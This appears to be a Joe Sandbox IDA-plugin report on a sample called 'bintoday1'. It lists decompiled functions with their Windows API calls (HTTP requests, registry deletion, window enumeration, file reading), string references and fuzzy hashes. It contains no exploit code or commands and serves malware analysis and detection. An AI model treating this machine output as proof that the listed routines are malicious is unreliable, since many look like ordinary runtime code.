Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 9b51dc241a4c0d6cd23ff0381ddda91e5b058c97266b39292252cb81fe44bc2d
Instruction ID: 28f7468c97a48ebb4b70673779589648bdb9bbe14cbe442129f62fff63aca9fb
Opcode Fuzzy Hash: 9b51dc241a4c0d6cd23ff0381ddda91e5b058c97266b39292252cb81fe44bc2d
Instruction Fuzzy Hash: F6616C71108301AFC711EF64DC85EAFBBE8EF89750F400A6EF595931A1DB709A49CB62

Function 00C0C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C0C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C0C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C0C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C0C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C0C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C0C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C0C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C0C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C0C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C0C5F0
InternetCloseHandle.WININET(00000000), ref: 00C0C5FB

Strings

, xrefs: 00C0C575

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 40ce148013a1c07462eb8b964f0b8c1dff65697bb920ea9194fc0caf0dee956f
Instruction ID: b749b641102367c849470e205f9f8ad2bd6dccdfdd1967de178a1b250a8aac72
Opcode Fuzzy Hash: 40ce148013a1c07462eb8b964f0b8c1dff65697bb920ea9194fc0caf0dee956f
Instruction Fuzzy Hash: 7D514AB4500604AFDB218FA1CDC8BAF7BBCFB08754F004519F95596690DB34EA45EBA0

Function 00C2856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C28592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C285F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C2FC38,?), ref: 00C28611
GlobalFree.KERNEL32(00000000), ref: 00C28621
GetObjectW.GDI32(?,00000018,?), ref: 00C28641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00C28671
DeleteObject.GDI32(?), ref: 00C28699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C286AF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 55ff38605366c37d70a07ed1dd394a2f3f8492e6d76af66efb6bcb9b482c27ab
Instruction ID: c025fc93925b52d5f1418920fc69a33e898050d0235e8cd247c629b17186a8a6
Opcode Fuzzy Hash: 55ff38605366c37d70a07ed1dd394a2f3f8492e6d76af66efb6bcb9b482c27ab
Instruction Fuzzy Hash: 9C412A75601214EFDB21DFA5DC88FAE7BB8EF89711F104059F915E7660DB30AA06CB60

Function 00C014BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C01502
VariantCopy.OLEAUT32(?,?), ref: 00C0150B
VariantClear.OLEAUT32(?), ref: 00C01517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C015FB
VarR8FromDec.OLEAUT32(?,?), ref: 00C01657
VariantInit.OLEAUT32(?), ref: 00C01708
SysFreeString.OLEAUT32(?), ref: 00C0178C
VariantClear.OLEAUT32(?), ref: 00C017D8
VariantClear.OLEAUT32(?), ref: 00C017E7
VariantInit.OLEAUT32(00000000), ref: 00C01823

Strings

Default, xrefs: 00C016AF
%4d%02d%02d%02d%02d%02d, xrefs: 00C01625

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: a56a5c7d802cc75c39ef88703d7c7b3c7b37bf4c73ffc8244fccd90b8703d786
Instruction ID: bc3e08542857b54d473bd9945ae4e5ad91439f71d2a44c50f7148060d1766b24
Opcode Fuzzy Hash: a56a5c7d802cc75c39ef88703d7c7b3c7b37bf4c73ffc8244fccd90b8703d786
Instruction Fuzzy Hash: 7BD1CE31A08519DBDB10AF66D885B7DF7F5BF45700F1880AAE846AF1C0DB30E945DBA1

Function 00C1B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00B99CB3: _wcslen.LIBCMT ref: 00B99CBD

Part of subcall function 00C1C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C1B6AE,?,?), ref: 00C1C9B5
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1C9F1
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA68
Part of subcall function 00C1C998: _wcslen.LIBCMT ref: 00C1CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C1B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C1B772
RegDeleteValueW.ADVAPI32(?,?), ref: 00C1B80A
RegCloseKey.ADVAPI32(?), ref: 00C1B87E
RegCloseKey.ADVAPI32(?), ref: 00C1B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C1B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C1B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 00C1B922
FreeLibrary.KERNEL32(00000000), ref: 00C1B983
RegCloseKey.ADVAPI32(00000000), ref: 00C1B994

Strings

RegDeleteKeyExW, xrefs: 00C1B8FE
advapi32.dll, xrefs: 00C1B8ED

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: c11480e3b4aa705dd2bfdf1388e545134802827e83097785e9a71b36fd37ebba
Instruction ID: 302e717c8437e04163f57723605f456ff7dda15cc98882570373c37072ad28f2
Opcode Fuzzy Hash: c11480e3b4aa705dd2bfdf1388e545134802827e83097785e9a71b36fd37ebba
Instruction Fuzzy Hash: BBC18D31208201AFD714DF24C495F6ABBE5BF85318F14859CF4AA4B2A2CB71ED86DF91

Function 00C1255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C125D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00C125E8
CreateCompatibleDC.GDI32(?), ref: 00C125F4
SelectObject.GDI32(00000000,?), ref: 00C12601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00C1266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00C126AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00C126D0
SelectObject.GDI32(?,?), ref: 00C126D8
DeleteObject.GDI32(?), ref: 00C126E1
DeleteDC.GDI32(?), ref: 00C126E8
ReleaseDC.USER32(00000000,?), ref: 00C126F3

Strings

(, xrefs: 00C1268D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 1fbbbd0459508f928f7fd3bba862685391133b06b4912e164039f86ab77420cf
Instruction ID: cf0f9e6795b0a25ca0e71f9d9ab526db1ef00724f9a1ef1352636d47758ad2ef
Opcode Fuzzy Hash: 1fbbbd0459508f928f7fd3bba862685391133b06b4912e164039f86ab77420cf
Instruction Fuzzy Hash: 4661E175D00219EFCF14CFA8D885AAEBBF6FF48310F208529E955A7250D770A951DFA0

Function 00BCDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BCDAA1

Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD659
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD66B
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD67D
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD68F
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6A1
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6B3
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6C5
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6D7
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6E9
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD6FB
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD70D
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD71F
Part of subcall function 00BCD63C: _free.LIBCMT ref: 00BCD731

_free.LIBCMT ref: 00BCDA96

Part of subcall function 00BC29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000), ref: 00BC29DE
Part of subcall function 00BC29C8: GetLastError.KERNEL32(00000000,?,00BCD7D1,00000000,00000000,00000000,00000000,?,00BCD7F8,00000000,00000007,00000000,?,00BCDBF5,00000000,00000000), ref: 00BC29F0

_free.LIBCMT ref: 00BCDAB8
_free.LIBCMT ref: 00BCDACD
_free.LIBCMT ref: 00BCDAD8
_free.LIBCMT ref: 00BCDAFA
_free.LIBCMT ref: 00BCDB0D
_free.LIBCMT ref: 00BCDB1B
_free.LIBCMT ref: 00BCDB26
_free.LIBCMT ref: 00BCDB5E
_free.LIBCMT ref: 00BCDB65
_free.LIBCMT ref: 00BCDB82
_free.LIBCMT ref: 00BCDB9A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f260df6e992a66283ab6fd0ad5fd8babe06d98a4c199615df65f564b9b3dc7ff
Instruction ID: c5196cba14ae1c08ce96667cfb7457aaea2dc32b8209a725478a6dd5b784d3c1
Opcode Fuzzy Hash: f260df6e992a66283ab6fd0ad5fd8babe06d98a4c199615df65f564b9b3dc7ff
Instruction Fuzzy Hash: A53136366047059FEB22AB39E845F5AB7E9FF04311F1544BDF489D72A1DA71AC80CB24

Function 00BF365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00BF369C
_wcslen.LIBCMT ref: 00BF36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BF3797
GetClassNameW.USER32(?,?,00000400), ref: 00BF380C
GetDlgCtrlID.USER32(?), ref: 00BF385D
GetWindowRect.USER32(?,?), ref: 00BF3882
GetParent.USER32(?), ref: 00BF38A0
ScreenToClient.USER32(00000000), ref: 00BF38A7
GetClassNameW.USER32(?,?,00000100), ref: 00BF3921
GetWindowTextW.USER32(?,?,00000400), ref: 00BF395D

Strings

%s%u, xrefs: 00BF3734

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: aac1df213fd0b2a33c035916c540adf7f9076544f7d62ec2e1241749e315a891
Instruction ID: 2c217312f7f345256d03d92a3fec5456fc31f949d9c3ad40aefea3c7f8111c11
Opcode Fuzzy Hash: aac1df213fd0b2a33c035916c540adf7f9076544f7d62ec2e1241749e315a891
Instruction Fuzzy Hash: 3F91917120460AAFD715DF24C885FBAF7E8FF44750F008569FA9AC3190DB74AA49CB91

Function 00BF4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00BF4994
GetWindowTextW.USER32(?,?,00000400), ref: 00BF49DA
_wcslen.LIBCMT ref: 00BF49EB
CharUpperBuffW.USER32(?,00000000), ref: 00BF49F7
_wcsstr.LIBVCRUNTIME ref: 00BF4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00BF4A64
GetWindowTextW.USER32(?,?,00000400), ref: 00BF4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00BF4AE6
GetClassNameW.USER32(?,?,00000400), ref: 00BF4B20
GetWindowRect.USER32(?,?), ref: 00BF4B8B

Strings

ThumbnailClass, xrefs: 00BF4A6F, 00BF4AF1

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: b41cbdae1360e5eb95f74938180d71af67a76e0c654d0cfc3ea3b778860f21ee
Instruction ID: d1f11494bfa6779794f446be6de2b0d3be3308a884e8981e379105d614c1e6e5
Opcode Fuzzy Hash: b41cbdae1360e5eb95f74938180d71af67a76e0c654d0cfc3ea3b778860f21ee
Instruction Fuzzy Hash: 47918B311082099FDB14CF14C985BBBB7E8EF84314F0484A9FE859B196DB70ED49CBA1

Function 00C28D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C28D5A
GetFocus.USER32 ref: 00C28D6A
GetDlgCtrlID.USER32(00000000), ref: 00C28D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C28E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C28ECF
GetMenuItemCount.USER32(?), ref: 00C28EEC
GetMenuItemID.USER32(?,00000000), ref: 00C28EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C28F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C28F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C28FA1

Strings

0, xrefs: 00C28E9F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 55940e7bc183b4482351d8e9dea5b78dc44fdf0e3087f4bfe595ea23439ddb2b
Instruction ID: f7a74a8adc503d615f132ecd9eaa415de7c16a6524cad240365afde53d51f742
Opcode Fuzzy Hash: 55940e7bc183b4482351d8e9dea5b78dc44fdf0e3087f4bfe595ea23439ddb2b
Instruction Fuzzy Hash: 1581D1715093219FDB20CF14E984AAF7BE9FF88314F040919F99497A91DB70DA09DBA1

Function 00BFDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BFDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BFDC46
_wcslen.LIBCMT ref: 00BFDC50
_wcsstr.LIBVCRUNTIME ref: 00BFDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BFDCBC

Strings

\VarFileInfo\Translation, xrefs: 00BFDCB4
StringFileInfo\, xrefs: 00BFDC8F
DefaultLangCodepage, xrefs: 00BFDD1F
04090000, xrefs: 00BFDCF2
%u.%u.%u.%u, xrefs: 00BFDD9A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 67f3fea7fe2bdfcc8360e26f795900250a77d9771080fdef1f589db7250a358d
Instruction ID: e72e69ddf67a1151d85933bd84211a993e449f6f37c0574f735337eeae62646a
Opcode Fuzzy Hash: 67f3fea7fe2bdfcc8360e26f795900250a77d9771080fdef1f589db7250a358d
Instruction Fuzzy Hash: 0F4102369442057BEB14A7649C83EFF77ECEF56710F5000B9FA00A7182EBB4990597A9

Function 00C1CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C1CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C1CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C1CD48

Part of subcall function 00C1CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C1CCAA
Part of subcall function 00C1CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C1CCBD
Part of subcall function 00C1CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C1CCCF
Part of subcall function 00C1CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C1CD05
Part of subcall function 00C1CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C1CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C1CCF3

Strings

RegDeleteKeyExW, xrefs: 00C1CCC9
advapi32.dll, xrefs: 00C1CCB8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 1871f73aee693ea6e0482ee76eedf477362940eee9c5bee8faa75330a6aa2d06
Instruction ID: c2b86226828ce7e68f114ec5e1b6ff637a39b871f84c4c5f506ebb1a0b87718a
Opcode Fuzzy Hash: 1871f73aee693ea6e0482ee76eedf477362940eee9c5bee8faa75330a6aa2d06
Instruction Fuzzy Hash: 2D317A71941129BBDB209B55ECC8FFFBB7CEF06740F000165F916E2640DA749E86EAA0

Function 00C03D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C03D40
_wcslen.LIBCMT ref: 00C03D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C03D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C03DBE
RemoveDirectoryW.KERNEL32(?), ref: 00C03DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C03E55
CloseHandle.KERNEL32(00000000), ref: 00C03E60
CloseHandle.KERNEL32(00000000), ref: 00C03E6B

Strings

\??\%s, xrefs: 00C03D5B
:, xrefs: 00C03D82
\, xrefs: 00C03D77

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 3f95dca5d7d9ba7cdde9ef9e7898c31f6d958b4171d288a1f7788c809ecec371
Instruction ID: a5ddf12b891dd18eac5d2ef7b892c4bd62081c0827e192602d86b206f15ec4eb
Opcode Fuzzy Hash: 3f95dca5d7d9ba7cdde9ef9e7898c31f6d958b4171d288a1f7788c809ecec371
